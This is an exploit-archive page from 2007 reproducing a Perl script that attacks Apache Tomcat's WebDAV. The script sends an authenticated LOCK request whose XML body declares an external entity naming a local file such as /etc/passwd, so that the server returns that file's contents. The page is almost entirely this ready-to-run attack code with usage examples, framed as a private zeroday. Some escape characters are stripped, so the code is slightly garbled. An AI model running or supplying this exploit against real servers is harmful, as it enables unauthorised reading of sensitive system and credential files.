Apache Tomcat (webdav) Remote File Disclosure Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Apache Tomcat (webdav) Remote File Disclosure Exploit
# Published : 2007-10-14
# Author : eliteboy
# Previous Title : eXtremail <= 2.1.1 PLAIN authentication Remote Stack Overflow Exploit
# Next Title : PBEmail 7 ActiveX Edition Insecure Method Exploit

#!/usr/bin/perl
#******************************************************
# Apache Tomcat Remote File Disclosure Zeroday Xploit
# kcdarookie aka eliteb0y / 2007
#
# thanx to the whole team & andi :)
# +++KEEP PRIV8+++
#
# This Bug may reside in different WebDav implementations,
# Warp your mind!
# +You will need auth for the exploit to work...
#******************************************************

use IO::Socket;
use MIME::Base64; ### FIXME! Maybe support other auths too ?

# SET REMOTE PORT HERE
$remoteport = 8080;

sub usage {
	print "Apache Tomcat Remote File Disclosure Zeroday Xploitn";
	print "kcdarookie aka eliteb0y / 2007n";
	print "usage: perl TOMCATXPL <remotehost> <webdav file> <file to retrieve> [username] [password]n";
	print "example: perl TOMCATXPL www.hostname.com /webdav /etc/passwd tomcat tomcatn";exit;
}

if ($#ARGV < 2) {usage();}

$hostname = $ARGV[0];
$webdavfile = $ARGV[1];
$remotefile = $ARGV[2];

$username = $ARGV[3];
$password = $ARGV[4];

my $sock = IO::Socket::INET->new(PeerAddr => $hostname,
                              PeerPort => $remoteport,
                              Proto    => 'tcp');
                              
$|=1;
$BasicAuth = encode_base64("$username:$password");

$KRADXmL = 
"<?xml version="1.0"?>n"
."<!DOCTYPE REMOTE [n"
."<!ENTITY RemoteX SYSTEM "$remotefile">n"
."]>n"
."<D:lockinfo xmlns:D='DAV:'>n"
."<D:lockscope><D:exclusive/></D:lockscope>n"
."<D:locktype><D:write/></D:locktype>n"
."<D:owner>n"
."<D:href>n"
."<REMOTE>n"
."<RemoteX>&RemoteX;</RemoteX>n"
."</REMOTE>n"
."</D:href>n"
."</D:owner>n"
."</D:lockinfo>n";

print "Apache Tomcat Remote File Disclosure Zeroday Xploitn";
print "kcdarookie aka eliteb0y / 2007n";
print "Launching Remote Exploit...n";

$ExploitRequest =
 "LOCK $webdavfile HTTP/1.1rn"
."Host: $hostnamern";

if ($username ne "") {
$ExploitRequest .= "Authorization: Basic $BasicAuthrn";	
}
$ExploitRequest .= "Content-Type: text/xmlrnContent-Length: ".length($KRADXmL)."rnrn" . $KRADXmL;

print $sock $ExploitRequest;

while(<$sock>) {
	print;
}

# www.Syue.com [2007-10-14]